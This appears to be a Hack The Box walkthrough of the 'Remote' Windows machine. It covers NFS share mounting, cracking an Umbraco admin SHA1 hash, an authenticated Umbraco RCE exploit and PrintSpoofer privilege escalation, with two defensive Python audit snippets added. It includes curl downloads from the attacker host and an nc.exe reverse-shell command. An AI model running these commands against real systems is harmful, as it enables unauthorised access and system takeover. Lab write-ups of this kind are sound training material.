
HTB - Remote
Scope
IP Address 10.10.10.180
Enumeration
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -p21,80,111,139,445,2049,5985 $ip -sCV -oA Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4s
| smb2-time:
| date: 2024-07-06T02:24:29
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
* Open ports: 21, 80, 111, 135, 139, 445, 2049, 5985
* UDP Open ports: 111, 2049
* Services: FTP - HTTP - RPC - SMB - NFS - winRM
* Important Notes: FTP Anonymous login
Service Enumeration
FTP
I noticed from Nmap that anonymous login is allowed, but it didn't lead to anything
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
2024-07-05 22:42:16 (0.00 B/s) - ‘10.10.10.180/.listing’ saved [0]
SMB
SMB enumeration didn't lead to anything either
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ smbclient -N -L //$ip
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.180 445 REMOTE [-] remote\: STATUS_ACCESS_DENIED
RPC
The same as SMB :(
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
NFS
I found port 2049 open, which is used by the Network File System (NFS), so I'll check whether there are any accessible exports
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ showmount -e $ip
Export list for 10.10.10.180:
/site_backups (everyone)
I found an interesting folder, so I'll mount it on my host and look at its contents
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ mkdir mnt
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ sudo mount -t nfs $ip:/ ./mnt -o nolock
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ cd mnt/site_backups
┌──(kali㉿kali)-[~/…/machines/Remote/mnt/site_backups]
└─$ ls
App_Browsers App_Plugins Global.asax Umbraco Views aspnet_client css scripts
App_Data Config Media Umbraco_Client Web.config bin default.aspx
I tried to hunt for usernames & passwords, but nothing turned up with the grep command, so I searched online for where Umbraco CMS stores its credentials and found this:

The CMS stores its credentials in Umbraco.sdf. After learning this, I tried to open the file with a text editor, but it's a binary file, so I listed its contents with strings and grepped for credentials
┌──(kali㉿kali)-[~/…/machines/Remote/mnt/App_Data]
└─$ strings Umbraco.sdf | grep "users\|password\|hashes\|admin"
<snip>
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
<snip>
So the file says that the hash is SHA1; let's fire up hashcat and crack it after getting the hashcat mode
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashid -m b8be16afba8c314ad33d812f22a04991b90e2aaa
[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashcat -m 100 hash /usr/share/wordlists/rockyou.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconanxxxxxxx
Session..........: hashcat
Status...........: Cracked
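As an added example (not code from the original writeup), here is a small parser for the user record that strings pulled out of Umbraco.sdf above, the kind of check an administrator can run over a site backup to spot accounts still stored with a legacy unsalted hash. The second sample record and the set of algorithms treated as weak are my own assumptions.

```python
import json
import re

# Constructed sample records, modelled on the strings|grep output from
# Umbraco.sdf above: login, hex hash and JSON metadata run together once the
# binary column separators are stripped. The second row is made up.
SAMPLE_RECORDS = [
    'admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}',
    "editor@example.test" + "0" * 40 + '{"hashAlgorithm":"HMACSHA256"}',
]

# Login text, then exactly 40 hex chars, then the JSON metadata up to end of
# line. Anchoring the JSON at the end pins the hash to the 40 chars before '{',
# even when the login itself ends in hex-looking characters.
RECORD_RE = re.compile(r'^(?P<login>.+?)(?P<hash>[0-9a-fA-F]{40})(?P<meta>\{.*\})$')

# Assumption for this audit: unsalted single-pass digests are treated as weak,
# because a leaked backup makes them cheap to crack offline (as shown above).
WEAK_ALGORITHMS = {"SHA1", "MD5"}


def parse_record(line):
    """Split one strings-extracted user record into login, hash and algorithm."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    try:
        meta = json.loads(m.group("meta"))
    except ValueError:
        return None  # trailing text was not the JSON metadata blob
    return {
        "login": m.group("login"),
        "hash": m.group("hash").lower(),
        "algorithm": str(meta.get("hashAlgorithm", "unknown")),
    }


def audit_records(lines):
    """Return (record, finding) pairs; finding is None when the record is fine."""
    results = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue  # not a user record (other strings output such as <snip>)
        finding = None
        if rec["algorithm"].upper() in WEAK_ALGORITHMS:
            finding = f"{rec['login']}: unsalted {rec['algorithm']} password hash"
        results.append((rec, finding))
    return results
```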
Initial Access
At http://10.10.10.180/umbraco/ there is a login form.

I logged in with the credentials found before, then looked for the web app version

I decided to search for public CVEs with searchsploit
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ searchsploit umbraco
<snip>
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
<snip>
I searched GitHub for a PoC matching the version of the web app and found this one:

I cloned it locally and ran the exploit
┌──(env)─(kali㉿kali)-[~/…/HTB/machines/Remote/Umbraco-RCE]
└─$ python exploit.py -u admin@htb.local -p 'baconanxxxxxxx' -w http://10.10.10.180/ -i 10.10.16.25
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49705
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49706
[*] Logging in at http://10.10.10.180//umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://10.10.10.180//umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode
PS C:\windows\system32\inetsrv>
PS C:\Users\Public> type Desktop\user.txt
442f18b8accdec694dxxxxxxxxxxx
Privilege Escalation
When I typed the whoami command and saw the output, I knew it was an easy win, because the user iis apppool\defaultapppool often has SeImpersonatePrivilege, which can be used to escalate to SYSTEM using RoguePotato or PrintSpoofer
PS C:\Users\Public> whoami
iis apppool\defaultapppool
Let's verify
PS C:\Users\Public> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
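As an added example (not part of the original writeup), a parser for whoami /priv output that flags impersonation privileges held by a service identity, so a defender can audit app-pool accounts for exactly the condition exploited next. The sample table is constructed from the rows above, and the set of privileges it flags is my own choice.

```python
# Constructed sample, modelled on the `whoami /priv` output above, trimmed to
# a few rows. Column alignment is cosmetic: the parser splits on whitespace,
# since privilege names and states never contain spaces.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Privileges that let a service identity run code under another account's
# token; an IIS app pool holding either is the escalation path used above.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_privileges(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    lines = text.splitlines()
    # Rows start after the '=====' separator under the column headers.
    start = next((i + 1 for i, l in enumerate(lines) if l.startswith("=====")), None)
    if start is None:
        return {}
    privs = {}
    for line in lines[start:]:
        parts = line.split()
        if len(parts) < 3:
            continue
        privs[parts[0]] = parts[-1]  # the description sits in between
    return privs


def risky_privileges(text):
    """Impersonation privileges present in the token, whether Enabled or
    Disabled (a Disabled privilege is still held and can be enabled by the holder)."""
    privs = parse_privileges(text)
    return sorted((n, s) for n, s in privs.items() if n in IMPERSONATION_PRIVS)


def assess(user, priv_text):
    """One-line finding for a service account, or None if nothing stands out."""
    risky = risky_privileges(priv_text)
    if not risky:
        return None
    held = ", ".join(f"{n} ({s})" for n, s in risky)
    return f"{user} holds {held}; confirm this identity needs them"
```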
I downloaded PrintSpoofer.exe & nc.exe from my attack host
PS C:\Users\Public> curl 10.10.16.25/PrintSpoofer.exe -o .\PrintSpoofer.exe
PS C:\Users\Public> curl 10.10.16.25/nc.exe -o .\nc.exe
Easy win :)
PS C:\Users\Public> .\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
.\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.180] 49719
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
60ea8c532b06a17faxxxxxxxxxxxxxxx